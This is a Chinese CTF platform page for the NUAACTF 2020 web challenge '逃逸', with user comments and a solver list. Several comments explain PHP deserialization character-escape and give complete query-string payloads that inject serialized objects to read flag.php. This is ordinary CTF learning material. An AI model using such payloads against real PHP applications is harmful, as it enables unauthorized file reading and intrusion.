逃逸WEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 100
提  示:
描  述:
flag{}
评论
whiteHaves 8月前

参数a负责扰乱,使序列化提前结束,参数b负责反序列化之后执行代码,注意:参数b序列化的对象是A类,但只要第二个参数的序列化结果,因为第一个参数就是参数a,不必包含,但是需要用1“结束前文;文件名的长度是8,不是12,因为文件名长度只看过滤后的结果。

回复 0

绝情且小帅 11月前

?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}

回复 0

xiaobai568 1年前

反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php

回复 0

zhaiye 1年前

?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}

回复 0

chaoge 1年前

不容易啊

回复 0

2728462336 1年前

注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度

回复 0

hopeinhand 1年前

反序列化字符逃逸

回复 1

WriteUp

image
sean

2 金币

评分(1)

解题动态

GnawKing 攻破了该题 7天前
kk190 攻破了该题 10天前
Waitcat 攻破了该题 1月前
Sh_eePppp 攻破了该题 2月前
snoway34 攻破了该题 2月前
ssqs 攻破了该题 2月前
小杰罗666 攻破了该题 2月前
Deyudeyu 攻破了该题 2月前
czg9000 攻破了该题 2月前
A1234467 攻破了该题 2月前
wangdashuai 攻破了该题 3月前
dir_tree 攻破了该题 3月前
TOMCAT336699 攻破了该题 3月前
2165518579牛逼 攻破了该题 3月前
t1tl3d 攻破了该题 3月前
zzhicecyb 攻破了该题 3月前
Jokerz 攻破了该题 4月前
zxingxing121 攻破了该题 4月前
19581700609 攻破了该题 4月前
ZianTT 攻破了该题 5月前
问题反馈